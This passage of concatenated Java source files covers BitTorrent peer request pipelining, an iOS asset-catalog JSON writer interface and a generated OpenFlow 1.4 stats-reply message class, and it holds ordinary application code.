+ peer); } else { if (_log.shouldLog(Log.WARN)) _log.warn("Got BAD " + req.getPiece() + " from " + peer); } } // ok done with this one synchronized(this) { pendingRequest = null; } } /** * @return index in outstandingRequests or -1 */ synchronized private int getFirstOutstandingRequest(int piece) { for (int i = 0; i < outstandingRequests.size(); i++) if (outstandingRequests.get(i).getPiece() == piece) return i; return -1; } /** * Called when a piece message is being processed by the incoming * connection. That is, when the header of the piece message was received. * Returns null when there was no such request. It also * requeues/sends requests when it thinks that they must have been * lost. */ Request getOutstandingRequest(int piece, int begin, int length) { if (_log.shouldLog(Log.DEBUG)) _log.debug("got start of Chunk(" + piece + "," + begin + "," + length + ") from " + peer); // Lookup the correct piece chunk request from the list. Request req; synchronized(this) { int r = getFirstOutstandingRequest(piece); // Unrequested piece number? if (r == -1) { if (_log.shouldLog(Log.INFO)) _log.info("Unrequested 'piece: " + piece + ", " + begin + ", " + length + "' received from " + peer); return null; } req = outstandingRequests.get(r); while (req.getPiece() == piece && req.off != begin && r < outstandingRequests.size() - 1) { r++; req = outstandingRequests.get(r); } // Something wrong? if (req.getPiece() != piece || req.off != begin || req.len != length) { if (_log.shouldLog(Log.INFO)) _log.info("Unrequested or unneeded 'piece: " + piece + ", " + begin + ", " + length + "' received from " + peer); return null; } // note that this request is being read pendingRequest = req; // Report missing requests. if (r != 0) { if (_log.shouldLog(Log.WARN)) _log.warn("Some requests dropped, got " + req + ", wanted for peer: " + peer); for (int i = 0; i < r; i++) { Request dropReq = outstandingRequests.remove(0); outstandingRequests.add(dropReq); if (!choked) out.sendRequest(dropReq); if (_log.shouldLog(Log.WARN)) _log.warn("dropped " + dropReq + " with peer " + peer); } } outstandingRequests.remove(0); } // Request more if necessary to keep the pipeline filled. addRequest(); return req; } /** * @return lowest offset of any request for the piece * @since 0.8.2 */ synchronized private Request getLowestOutstandingRequest(int piece) { Request rv = null; int lowest = Integer.MAX_VALUE; for (Request r : outstandingRequests) { if (r.getPiece() == piece && r.off < lowest) { lowest = r.off; rv = r; } } if (pendingRequest != null && pendingRequest.getPiece() == piece && pendingRequest.off < lowest) rv = pendingRequest; if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " lowest for " + piece + " is " + rv + " out of " + pendingRequest + " and " + outstandingRequests); return rv; } /** * Get partial pieces, give them back to PeerCoordinator. * Clears the request queue. * @return List of PartialPieces, even those with an offset == 0, or empty list * @since 0.8.2 */ synchronized List<Request> returnPartialPieces() { Set<Integer> pcs = getRequestedPieces(); List<Request> rv = new ArrayList<Request>(pcs.size()); for (Integer p : pcs) { Request req = getLowestOutstandingRequest(p.intValue()); if (req != null) { req.getPartialPiece().setDownloaded(req.off); rv.add(req); } } outstandingRequests.clear(); pendingRequest = null; lastRequest = null; return rv; } /** * @return all pieces we are currently requesting, or empty Set */ synchronized private Set<Integer> getRequestedPieces() { Set<Integer> rv = new HashSet<Integer>(outstandingRequests.size() + 1); for (Request req : outstandingRequests) { rv.add(Integer.valueOf(req.getPiece())); if (pendingRequest != null) rv.add(Integer.valueOf(pendingRequest.getPiece())); } return rv; } void cancelMessage(int piece, int begin, int length) { if (_log.shouldLog(Log.DEBUG)) _log.debug("Got cancel message (" + piece + ", " + begin + ", " + length + ")"); out.cancelRequest(piece, begin, length); } /** @since 0.8.2 */ void extensionMessage(int id, byte[] bs) { if (metainfo != null && metainfo.isPrivate() && (id == ExtensionHandler.ID_METADATA || id == ExtensionHandler.ID_PEX)) { // shouldn't get this since we didn't advertise it but they could send it anyway if (_log.shouldLog(Log.WARN)) _log.warn("Private torrent, ignoring ext msg " + id); return; } ExtensionHandler.handleMessage(peer, listener, id, bs); // Peer coord will get metadata from MagnetState, // verify, and then call gotMetaInfo() listener.gotExtension(peer, id, bs); } /** * Switch from magnet mode to normal mode. * If we already have the metainfo, this does nothing. * @param meta non-null * @since 0.8.4 */ public void setMetaInfo(MetaInfo meta) { if (metainfo != null) return; BitField oldBF = bitfield; if (oldBF != null) { if (oldBF.size() != meta.getPieces()) // fix bitfield, it was too big by 1-7 bits bitfield = new BitField(oldBF.getFieldBytes(), meta.getPieces()); // else no extra } else { // it will be initialized later //bitfield = new BitField(meta.getPieces()); } metainfo = meta; if (bitfield != null && bitfield.count() > 0) setInteresting(true); } /** * Unused * @since 0.8.4 */ void portMessage(int port) { // for compatibility with old DHT PORT message listener.gotPort(peer, port, port + 1); } void unknownMessage(int type, byte[] bs) { if (_log.shouldLog(Log.WARN)) _log.warn("Warning: Ignoring unknown message type: " + type + " length: " + bs.length); } /** * We now have this piece. * Tell the peer and cancel any requests for the piece. */ void havePiece(int piece) { if (_log.shouldLog(Log.DEBUG)) _log.debug("Tell " + peer + " havePiece(" + piece + ")"); // Tell the other side that we are no longer interested in any of // the outstanding requests for this piece. cancelPiece(piece); // Tell the other side that we really have this piece. out.sendHave(piece); // Request something else if necessary. addRequest(); /**** taken care of in addRequest() synchronized(this) { // Is the peer still interesting? if (lastRequest == null) setInteresting(false); } ****/ } /** * Tell the other side that we are no longer interested in any of * the outstanding requests (if any) for this piece. * @since 0.8.1 */ synchronized void cancelPiece(int piece) { if (lastRequest != null && lastRequest.getPiece() == piece) lastRequest = null; Iterator<Request> it = outstandingRequests.iterator(); while (it.hasNext()) { Request req = it.next(); if (req.getPiece() == piece) { it.remove(); // Send cancel even when we are choked to make sure that it is // really never ever send. out.sendCancel(req); req.getPartialPiece().release(); } } } /** * Are we currently requesting the piece? * @deprecated deadlocks * @since 0.8.1 */ synchronized boolean isRequesting(int piece) { if (pendingRequest != null && pendingRequest.getPiece() == piece) return true; for (Request req : outstandingRequests) { if (req.getPiece() == piece) return true; } return false; } /** * Starts or resumes requesting pieces. * @param resend should we resend outstanding requests? */ private void request(boolean resend) { // Are there outstanding requests that have to be resend? if (resend) { synchronized (this) { if (!outstandingRequests.isEmpty()) { out.sendRequests(outstandingRequests); if (_log.shouldLog(Log.DEBUG)) _log.debug("Resending requests to " + peer + outstandingRequests); } } } // Add/Send some more requests if necessary. addRequest(); } /** * Adds a new request to the outstanding requests list. * Then send interested if we weren't. * Then send new requests if not choked. * If nothing to request, send not interested if we were. * * This is called from several places: *<pre> * By getOustandingRequest() when the first part of a chunk comes in * By havePiece() when somebody got a new piece completed * By chokeMessage() when we receive an unchoke * By setInteresting() when we are now interested * By PeerCoordinator.updatePiecePriorities() *</pre> */ synchronized void addRequest() { // no bitfield yet? nothing to request then. if (bitfield == null) return; if (metainfo == null) return; boolean more_pieces = true; while (more_pieces) { more_pieces = outstandingRequests.size() < MAX_PIPELINE; // We want something and we don't have outstanding requests? if (more_pieces && lastRequest == null) { // we have nothing in the queue right now if (!interesting) { // If we need something, set interesting but delay pulling // a request from the PeerCoordinator until unchoked. if (listener.needPiece(this.peer, bitfield)) { setInteresting(true); if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " addRequest() we need something, setting interesting, delaying requestNextPiece()"); } else { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " addRequest() needs nothing"); } return; } if (choked) { // If choked, delay pulling // a request from the PeerCoordinator until unchoked. if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " addRequest() we are choked, delaying requestNextPiece()"); return; } // huh? rv unused more_pieces = requestNextPiece(); } else if (more_pieces) // We want something { int pieceLength; boolean isLastChunk; pieceLength = metainfo.getPieceLength(lastRequest.getPiece()); isLastChunk = lastRequest.off + lastRequest.len == pieceLength; // Last part of a piece? if (isLastChunk) more_pieces = requestNextPiece(); else { PartialPiece nextPiece = lastRequest.getPartialPiece(); int nextBegin = lastRequest.off + PARTSIZE; int maxLength = pieceLength - nextBegin; int nextLength = maxLength > PARTSIZE ? PARTSIZE : maxLength; Request req = new Request(nextPiece,nextBegin, nextLength); outstandingRequests.add(req); if (!choked) out.sendRequest(req); lastRequest = req; } } } // failsafe // However this is bad as it thrashes the peer when we change our mind // Ticket 691 cause here? if (interesting && lastRequest == null && outstandingRequests.isEmpty()) setInteresting(false); if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " requests " + outstandingRequests); } /** * Starts requesting first chunk of next piece. Returns true if * something has been added to the requests, false otherwise. * Caller should synchronize. */ private boolean requestNextPiece() { // Check that we already know what the other side has. if (bitfield != null) { // Check for adopting an orphaned partial piece PartialPiece pp = listener.getPartialPiece(peer, bitfield); if (pp != null) { // Double-check that r not already in outstandingRequests if (!getRequestedPieces().contains(Integer.valueOf(pp.getPiece()))) { Request r = pp.getRequest(); outstandingRequests.add(r); if (!choked) out.sendRequest(r); lastRequest = r; return true; } else { if (_log.shouldLog(Log.WARN)) _log.warn("Got dup from coord: " + pp); pp.release(); } } /******* getPartialPiece() does it all now // Note that in addition to the bitfield, PeerCoordinator uses // its request tracking and isRequesting() to determine // what piece to give us next. int nextPiece = listener.wantPiece(peer, bitfield); if (nextPiece != -1 && (lastRequest == null || lastRequest.getPiece() != nextPiece)) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " want piece " + nextPiece); // Fail safe to make sure we are interested // When we transition into the end game we may not be interested... if (!interesting) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " transition to end game, setting interesting"); interesting = true; out.sendInterest(true); } int piece_length = metainfo.getPieceLength(nextPiece); //Catch a common place for OOMs esp. on 1MB pieces byte[] bs; try { bs = new byte[piece_length]; } catch (OutOfMemoryError oom) { _log.warn("Out of memory, can't request piece " + nextPiece, oom); return false; } int length = Math.min(piece_length, PARTSIZE); Request req = new Request(nextPiece, bs, 0, length); outstandingRequests.add(req); if (!choked) out.sendRequest(req); lastRequest = req; return true; } else { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " no more pieces to request"); } *******/ } // failsafe // However this is bad as it thrashes the peer when we change our mind // Ticket 691 cause here? if (outstandingRequests.isEmpty()) lastRequest = null; // If we are not in the end game, we may run out of things to request // because we are asking other peers. Set not-interesting now rather than // wait for those other requests to be satisfied via havePiece() if (interesting && lastRequest == null) { interesting = false; out.sendInterest(false); if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " nothing more to request, now uninteresting"); } return false; } synchronized void setInteresting(boolean interest) { if (interest != interesting) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " setInteresting(" + interest + ")"); interesting = interest; out.sendInterest(interest); if (interesting && !choked) request(true); // we shouldnt have any pending requests, but if we do, resend them } } synchronized void setChoking(boolean choke) { if (choking != choke) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " setChoking(" + choke + ")"); choking = choke; out.sendChoke(choke); } } void keepAlive() { out.sendAlive(); } synchronized void retransmitRequests() { if (interesting && !choked) out.retransmitRequests(outstandingRequests); } /** * debug * @return string or null * @since 0.8.1 */ synchronized String getRequests() { if (outstandingRequests.isEmpty()) return null; else return outstandingRequests.toString(); } }
/** * Copyright (c) 2013 gootara.org <http://gootara.org> * * The MIT License (MIT) * * Permission is hereby granted, free of charge, to any person obtaining a copy of * this software and associated documentation files (the "Software"), to deal in * the Software without restriction, including without limitation the rights to * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of * the Software, and to permit persons to whom the Software is furnished to do so, * subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package org.gootara.ios.image.util; import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.util.ArrayList; import java.util.LinkedHashMap; import java.util.Map; /** * The asset catalogs for iOS. * * @author gootara.org */ public interface IOSAssetCatalogs { public enum JSON_KEY { IDIOM ("idiom") , FILENAME ("filename") , SUBTYPE ("subtype") , ROLE ("role") , SCALE ("scale") , SIZE ("size") , ORIENTATION ("orientation") , EXTENT ("extent") , SCREEN_WIDTH ("screenWidth") , WIDTH_CLASS ("widthClass") , HEIGHT_CLASS ("heightClass") , MINIMUM_SYSTEM_VERSION ("minimum-system-version") ; private String keyName; JSON_KEY(String keyName) { this.keyName = keyName; } @Override public String toString() { return this.keyName; } } public enum SYSTEM_VERSION { ANY (0.0f) , IOS7 (7.0f) , IOS8 (8.0f) , IOS9 (9.0f) , IOS10 (10.0f) , IOS11 (11.0f) ; private float value; SYSTEM_VERSION(float value) { this.value = value; } @Override public String toString() { return String.format("%.1f", value); } public float value() { return value; } public boolean later(SYSTEM_VERSION that) { return that.value < this.value; } public boolean andLater(SYSTEM_VERSION that) { return that.value <= this.value; } public boolean prior(SYSTEM_VERSION that) { return that.value > this.value; } public boolean andPrior(SYSTEM_VERSION that) { return that.value >= this.value; } } public enum IDIOM { UNIVERSAL ("universal") , IPHONE ("iphone") , IPAD ("ipad") , CARPLAY ("car") , APPLEWATCH ("watch") , MAC ("mac") , TV ("tv") , IOS_MARKETING ("ios-marketing") , WATCH_MARKETING ("watch-marketing") ; private String idiom; IDIOM(String idiom) { this.idiom = idiom; } @Override public String toString() { return this.idiom; } public boolean isUniversal() { return this.idiom.equals(UNIVERSAL.toString()); } public boolean isIphone() { return this.idiom.equals(IPHONE.toString()); } public boolean isIpad() { return this.idiom.equals(IPAD.toString()); } public boolean isAppleWatch() { return this.idiom.equals(APPLEWATCH.toString()); } public boolean isCarplay() { return this.idiom.equals(CARPLAY.toString()); } public boolean isMac() { return this.idiom.equals(MAC.toString()); } public boolean isTv() { return this.idiom.equals(TV.toString()); } public boolean isiOSMarketing() { return this.idiom.equals(IOS_MARKETING.toString()); } public boolean isWatchMarketing() { return this.idiom.equals(WATCH_MARKETING.toString()); } } public enum SUBTYPE { RETINA4 ("retina4") , H667 ("667h") , H736 ("736h") , H1366 ("1366h") , H2436 ("2436h") , MM38 ("38mm") , MM42 ("42mm") ; private String subtype; SUBTYPE(String subtype) { this.subtype = subtype; } @Override public String toString() { return this.subtype; } } public enum EXTENT { FULL_SCREEN ("full-screen") , TO_STATUS_BAR ("to-status-bar") ; private String extent; EXTENT(String extent) { this.extent = extent; } @Override public String toString() { return this.extent; } } public enum ROLE { NOTIFICATION_CENTER ("notificationCenter") , COMPANION_SETTINGS ("companionSettings") , APP_LAUNCHER ("appLauncher") , LONG_LOOK ("longLook") , QUICK_LOOK ("quickLook") ; private String role; ROLE(String role) { this.role = role; } @Override public String toString() { return this.role; } } public enum JSON_VALUE { SCREEN_WIDTH_38MM ("{130,145}") , SCREEN_WIDTH_42MM ("{146,165}") , ORIENTATION_LANDSCAPE ("landscape") , ORIENTATION_PORTRAIT ("portrait") , SIZE_CLASS_ANY ("any") , SIZE_CLASS_COMPACT ("compact") , SIZE_CLASS_REGULAR ("regular") ; private String value; JSON_VALUE(String value) { this.value = value; } @Override public String toString() { return this.value; } } public enum JSON_INFO_KEY { VERSION ("version") , AUTHOR ("author") , RENDERING ("template-rendering-intent") ; private String keyName; JSON_INFO_KEY(String keyName) { this.keyName = keyName; } @Override public String toString() { return this.keyName; } } public enum JSON_INFO_VALUE { VERSION_1 ("1") , AUTHOR_XCODE ("\"xcode\"") , RENDERING_ORIGINAL ("\"original\"") , RENDERING_TEMPLATE ("\"template\"") ; private String value; JSON_INFO_VALUE(String value) { this.value = value; } @Override public String toString() { return this.value; } } public enum JSON_PROPERTY_KEY { PRE_RENDERED ("pre-rendered") ; private String keyName; JSON_PROPERTY_KEY(String keyName) { this.keyName = keyName; } @Override public String toString() { return this.keyName; } } public enum JSON_PROPERTY_VALUE { PRE_RENDERED_TRUE ("true") ; private String value; JSON_PROPERTY_VALUE(String value) { this.value = value; } @Override public String toString() { return this.value; } } class JsonUtility extends ArrayList<IOSAssetCatalogs> { private LinkedHashMap<JSON_INFO_KEY, JSON_INFO_VALUE> info; private LinkedHashMap<JSON_PROPERTY_KEY, JSON_PROPERTY_VALUE> properties; public JsonUtility() { super(); this.info = new LinkedHashMap<JSON_INFO_KEY, JSON_INFO_VALUE>(); setInfo(JSON_INFO_KEY.VERSION, JSON_INFO_VALUE.VERSION_1); setInfo(JSON_INFO_KEY.AUTHOR, JSON_INFO_VALUE.AUTHOR_XCODE); this.properties = new LinkedHashMap<JSON_PROPERTY_KEY, JSON_PROPERTY_VALUE>(); } @Override public void clear() { this.info.clear(); this.properties.clear(); super.clear(); } /** * Set additional json infromation. * * @param key * @param value * @return */ public JsonUtility setInfo(JSON_INFO_KEY key, JSON_INFO_VALUE value) { if (value == null) { this.removeInfo(key); } else { info.put(key, value); } return this; } /** * Get additional json information. * * @param key * @return */ public JSON_INFO_VALUE getInfo(JSON_INFO_KEY key) { return info.get(key); } /** * Remove additional json information. * * @param key * @return */ public boolean removeInfo(JSON_INFO_KEY key) { return info.remove(key) != null; } /** * Contains additional json information. * * @param key * @return */ public boolean containsInfo(JSON_INFO_KEY key) { return info.containsKey(key); } /** * Set additional json property. * * @param key * @param value * @return */ public JsonUtility setProperty(JSON_PROPERTY_KEY key, JSON_PROPERTY_VALUE value) { if (value == null) { this.removeProperty(key); } else { properties.put(key, value); } return this; } /** * Get additional json property. * * @param key * @return */ public JSON_PROPERTY_VALUE getProperty(JSON_PROPERTY_KEY key) { return properties.get(key); } /** * Remove additional json property. * * @param key * @return */ public boolean removeProperty(JSON_PROPERTY_KEY key) { return properties.remove(key) != null; } /** * Contains additional json property. * * @param key * @return */ public boolean containsProperty(JSON_PROPERTY_KEY key) { return properties.containsKey(key); } /** * Write "Content.json" to File * * @param f * @throws IOException */ public void writeContentJson(File f) throws IOException { BufferedWriter writer = null; try { writer = new BufferedWriter(new FileWriter(f)); writer.write("{\n \"images\" : [\n"); boolean first = true; for (IOSAssetCatalogs imageSet : this) { if (first) { first = false; } else { writer.write(",\n"); } writer.write(((IOSAssetCatalogs) imageSet).toJson()); } writer.write("\n ],\n \"info\" : {\n"); first = true; for (Map.Entry<JSON_INFO_KEY, JSON_INFO_VALUE> keyValue : info.entrySet()) { writer.write(String.format("%s \"%s\" : %s", (first ? "" : ",\n"), keyValue.getKey(), keyValue.getValue())); first = false; } writer.write("\n }"); if (properties.size() > 0) { writer.write(",\n \"properties\" : {\n"); first = true; for (Map.Entry<JSON_PROPERTY_KEY, JSON_PROPERTY_VALUE> keyValue : properties.entrySet()) { writer.write(String.format("%s \"%s\" : %s", (first ? "" : ",\n"), keyValue.getKey(), keyValue.getValue())); first = false; } writer.write("\n }"); } writer.write("\n}"); writer.close(); writer = null; } catch (IOException ioex) { throw ioex; } finally { if (writer != null) { try { writer.close(); } catch (Exception ex) { ex.printStackTrace(); } } } } } /** * Get IOSImageInfo. * * @return IOSImageInfo * @see org.gootara.ios.image.util.IOSImageInfo */ public IOSImageInfo getIOSImageInfo(); /** * Get idiom. * * @return idiom */ public IDIOM getIdiom(); /** * Get minimum system version. * * @return minimum system version */ public SYSTEM_VERSION getMinimumSystemVersion(); /** * Get image filename. * * @return filename */ public String getFilename(); /** * Get subtype. * * @return subtype */ public SUBTYPE getSubType(); /** * Get role. * * @return subtype */ public ROLE getRole(); /** * Get JSON string. * * @return JSON string */ public String toJson(); }
// Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University // Copyright (c) 2011, 2012 Open Networking Foundation // Copyright (c) 2012, 2013 Big Switch Networks, Inc. // This library was generated by the LoxiGen Compiler. // See the file LICENSE.txt which should have been included in the source distribution // Automatically generated by LOXI from template of_class.java // Do not modify package org.projectfloodlight.openflow.protocol.ver14; import org.projectfloodlight.openflow.protocol.*; import org.projectfloodlight.openflow.protocol.action.*; import org.projectfloodlight.openflow.protocol.actionid.*; import org.projectfloodlight.openflow.protocol.bsntlv.*; import org.projectfloodlight.openflow.protocol.errormsg.*; import org.projectfloodlight.openflow.protocol.meterband.*; import org.projectfloodlight.openflow.protocol.instruction.*; import org.projectfloodlight.openflow.protocol.instructionid.*; import org.projectfloodlight.openflow.protocol.match.*; import org.projectfloodlight.openflow.protocol.oxm.*; import org.projectfloodlight.openflow.protocol.queueprop.*; import org.projectfloodlight.openflow.types.*; import org.projectfloodlight.openflow.util.*; import org.projectfloodlight.openflow.exceptions.*; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.util.Set; import com.google.common.collect.ImmutableSet; import java.util.List; import com.google.common.collect.ImmutableList; import org.jboss.netty.buffer.ChannelBuffer; import com.google.common.hash.PrimitiveSink; import com.google.common.hash.Funnel; class OFBsnSwitchPipelineStatsReplyVer14 implements OFBsnSwitchPipelineStatsReply { private static final Logger logger = LoggerFactory.getLogger(OFBsnSwitchPipelineStatsReplyVer14.class); // version: 1.4 final static byte WIRE_VERSION = 5; final static int MINIMUM_LENGTH = 24; private final static long DEFAULT_XID = 0x0L; private final static Set<OFStatsReplyFlags> DEFAULT_FLAGS = ImmutableSet.<OFStatsReplyFlags>of(); private final static List<OFBsnSwitchPipelineStatsEntry> DEFAULT_ENTRIES = ImmutableList.<OFBsnSwitchPipelineStatsEntry>of(); // OF message fields private final long xid; private final Set<OFStatsReplyFlags> flags; private final List<OFBsnSwitchPipelineStatsEntry> entries; // // Immutable default instance final static OFBsnSwitchPipelineStatsReplyVer14 DEFAULT = new OFBsnSwitchPipelineStatsReplyVer14( DEFAULT_XID, DEFAULT_FLAGS, DEFAULT_ENTRIES ); // package private constructor - used by readers, builders, and factory OFBsnSwitchPipelineStatsReplyVer14(long xid, Set<OFStatsReplyFlags> flags, List<OFBsnSwitchPipelineStatsEntry> entries) { if(flags == null) { throw new NullPointerException("OFBsnSwitchPipelineStatsReplyVer14: property flags cannot be null"); } if(entries == null) { throw new NullPointerException("OFBsnSwitchPipelineStatsReplyVer14: property entries cannot be null"); } this.xid = xid; this.flags = flags; this.entries = entries; } // Accessors for OF message fields @Override public OFVersion getVersion() { return OFVersion.OF_14; } @Override public OFType getType() { return OFType.STATS_REPLY; } @Override public long getXid() { return xid; } @Override public OFStatsType getStatsType() { return OFStatsType.EXPERIMENTER; } @Override public Set<OFStatsReplyFlags> getFlags() { return flags; } @Override public long getExperimenter() { return 0x5c16c7L; } @Override public long getSubtype() { return 0x6L; } @Override public List<OFBsnSwitchPipelineStatsEntry> getEntries() { return entries; } public OFBsnSwitchPipelineStatsReply.Builder createBuilder() { return new BuilderWithParent(this); } static class BuilderWithParent implements OFBsnSwitchPipelineStatsReply.Builder { final OFBsnSwitchPipelineStatsReplyVer14 parentMessage; // OF message fields private boolean xidSet; private long xid; private boolean flagsSet; private Set<OFStatsReplyFlags> flags; private boolean entriesSet; private List<OFBsnSwitchPipelineStatsEntry> entries; BuilderWithParent(OFBsnSwitchPipelineStatsReplyVer14 parentMessage) { this.parentMessage = parentMessage; } @Override public OFVersion getVersion() { return OFVersion.OF_14; } @Override public OFType getType() { return OFType.STATS_REPLY; } @Override public long getXid() { return xid; } @Override public OFBsnSwitchPipelineStatsReply.Builder setXid(long xid) { this.xid = xid; this.xidSet = true; return this; } @Override public OFStatsType getStatsType() { return OFStatsType.EXPERIMENTER; } @Override public Set<OFStatsReplyFlags> getFlags() { return flags; } @Override public OFBsnSwitchPipelineStatsReply.Builder setFlags(Set<OFStatsReplyFlags> flags) { this.flags = flags; this.flagsSet = true; return this; } @Override public long getExperimenter() { return 0x5c16c7L; } @Override public long getSubtype() { return 0x6L; } @Override public List<OFBsnSwitchPipelineStatsEntry> getEntries() { return entries; } @Override public OFBsnSwitchPipelineStatsReply.Builder setEntries(List<OFBsnSwitchPipelineStatsEntry> entries) { this.entries = entries; this.entriesSet = true; return this; } @Override public OFBsnSwitchPipelineStatsReply build() { long xid = this.xidSet ? this.xid : parentMessage.xid; Set<OFStatsReplyFlags> flags = this.flagsSet ? this.flags : parentMessage.flags; if(flags == null) throw new NullPointerException("Property flags must not be null"); List<OFBsnSwitchPipelineStatsEntry> entries = this.entriesSet ? this.entries : parentMessage.entries; if(entries == null) throw new NullPointerException("Property entries must not be null"); // return new OFBsnSwitchPipelineStatsReplyVer14( xid, flags, entries ); } } static class Builder implements OFBsnSwitchPipelineStatsReply.Builder { // OF message fields private boolean xidSet; private long xid; private boolean flagsSet; private Set<OFStatsReplyFlags> flags; private boolean entriesSet; private List<OFBsnSwitchPipelineStatsEntry> entries; @Override public OFVersion getVersion() { return OFVersion.OF_14; } @Override public OFType getType() { return OFType.STATS_REPLY; } @Override public long getXid() { return xid; } @Override public OFBsnSwitchPipelineStatsReply.Builder setXid(long xid) { this.xid = xid; this.xidSet = true; return this; } @Override public OFStatsType getStatsType() { return OFStatsType.EXPERIMENTER; } @Override public Set<OFStatsReplyFlags> getFlags() { return flags; } @Override public OFBsnSwitchPipelineStatsReply.Builder setFlags(Set<OFStatsReplyFlags> flags) { this.flags = flags; this.flagsSet = true; return this; } @Override public long getExperimenter() { return 0x5c16c7L; } @Override public long getSubtype() { return 0x6L; } @Override public List<OFBsnSwitchPipelineStatsEntry> getEntries() { return entries; } @Override public OFBsnSwitchPipelineStatsReply.Builder setEntries(List<OFBsnSwitchPipelineStatsEntry> entries) { this.entries = entries; this.entriesSet = true; return this; } // @Override public OFBsnSwitchPipelineStatsReply build() { long xid = this.xidSet ? this.xid : DEFAULT_XID; Set<OFStatsReplyFlags> flags = this.flagsSet ? this.flags : DEFAULT_FLAGS; if(flags == null) throw new NullPointerException("Property flags must not be null"); List<OFBsnSwitchPipelineStatsEntry> entries = this.entriesSet ? this.entries : DEFAULT_ENTRIES; if(entries == null) throw new NullPointerException("Property entries must not be null"); return new OFBsnSwitchPipelineStatsReplyVer14( xid, flags, entries ); } } final static Reader READER = new Reader(); static class Reader implements OFMessageReader<OFBsnSwitchPipelineStatsReply> { @Override public OFBsnSwitchPipelineStatsReply readFrom(ChannelBuffer bb) throws OFParseError { int start = bb.readerIndex(); // fixed value property version == 5 byte version = bb.readByte(); if(version != (byte) 0x5) throw new OFParseError("Wrong version: Expected=OFVersion.OF_14(5), got="+version); // fixed value property type == 19 byte type = bb.readByte(); if(type != (byte) 0x13) throw new OFParseError("Wrong type: Expected=OFType.STATS_REPLY(19), got="+type); int length = U16.f(bb.readShort()); if(length < MINIMUM_LENGTH) throw new OFParseError("Wrong length: Expected to be >= " + MINIMUM_LENGTH + ", was: " + length); if(bb.readableBytes() + (bb.readerIndex() - start) < length) { // Buffer does not have all data yet bb.readerIndex(start); return null; } if(logger.isTraceEnabled()) logger.trace("readFrom - length={}", length); long xid = U32.f(bb.readInt()); // fixed value property statsType == 65535 short statsType = bb.readShort(); if(statsType != (short) 0xffff) throw new OFParseError("Wrong statsType: Expected=OFStatsType.EXPERIMENTER(65535), got="+statsType); Set<OFStatsReplyFlags> flags = OFStatsReplyFlagsSerializerVer14.readFrom(bb); // pad: 4 bytes bb.skipBytes(4); // fixed value property experimenter == 0x5c16c7L int experimenter = bb.readInt(); if(experimenter != 0x5c16c7) throw new OFParseError("Wrong experimenter: Expected=0x5c16c7L(0x5c16c7L), got="+experimenter); // fixed value property subtype == 0x6L int subtype = bb.readInt(); if(subtype != 0x6) throw new OFParseError("Wrong subtype: Expected=0x6L(0x6L), got="+subtype); List<OFBsnSwitchPipelineStatsEntry> entries = ChannelUtils.readList(bb, length - (bb.readerIndex() - start), OFBsnSwitchPipelineStatsEntryVer14.READER); OFBsnSwitchPipelineStatsReplyVer14 bsnSwitchPipelineStatsReplyVer14 = new OFBsnSwitchPipelineStatsReplyVer14( xid, flags, entries ); if(logger.isTraceEnabled()) logger.trace("readFrom - read={}", bsnSwitchPipelineStatsReplyVer14); return bsnSwitchPipelineStatsReplyVer14; } } public void putTo(PrimitiveSink sink) { FUNNEL.funnel(this, sink); } final static OFBsnSwitchPipelineStatsReplyVer14Funnel FUNNEL = new OFBsnSwitchPipelineStatsReplyVer14Funnel(); static class OFBsnSwitchPipelineStatsReplyVer14Funnel implements Funnel<OFBsnSwitchPipelineStatsReplyVer14> { private static final long serialVersionUID = 1L; @Override public void funnel(OFBsnSwitchPipelineStatsReplyVer14 message, PrimitiveSink sink) { // fixed value property version = 5 sink.putByte((byte) 0x5); // fixed value property type = 19 sink.putByte((byte) 0x13); // FIXME: skip funnel of length sink.putLong(message.xid); // fixed value property statsType = 65535 sink.putShort((short) 0xffff); OFStatsReplyFlagsSerializerVer14.putTo(message.flags, sink); // skip pad (4 bytes) // fixed value property experimenter = 0x5c16c7L sink.putInt(0x5c16c7); // fixed value property subtype = 0x6L sink.putInt(0x6); FunnelUtils.putList(message.entries, sink); } } public void writeTo(ChannelBuffer bb) { WRITER.write(bb, this); } final static Writer WRITER = new Writer(); static class Writer implements OFMessageWriter<OFBsnSwitchPipelineStatsReplyVer14> { @Override public void write(ChannelBuffer bb, OFBsnSwitchPipelineStatsReplyVer14 message) { int startIndex = bb.writerIndex(); // fixed value property version = 5 bb.writeByte((byte) 0x5); // fixed value property type = 19 bb.writeByte((byte) 0x13); // length is length of variable message, will be updated at the end int lengthIndex = bb.writerIndex(); bb.writeShort(U16.t(0)); bb.writeInt(U32.t(message.xid)); // fixed value property statsType = 65535 bb.writeShort((short) 0xffff); OFStatsReplyFlagsSerializerVer14.writeTo(bb, message.flags); // pad: 4 bytes bb.writeZero(4); // fixed value property experimenter = 0x5c16c7L bb.writeInt(0x5c16c7); // fixed value property subtype = 0x6L bb.writeInt(0x6); ChannelUtils.writeList(bb, message.entries); // update length field int length = bb.writerIndex() - startIndex; bb.setShort(lengthIndex, length); } } @Override public String toString() { StringBuilder b = new StringBuilder("OFBsnSwitchPipelineStatsReplyVer14("); 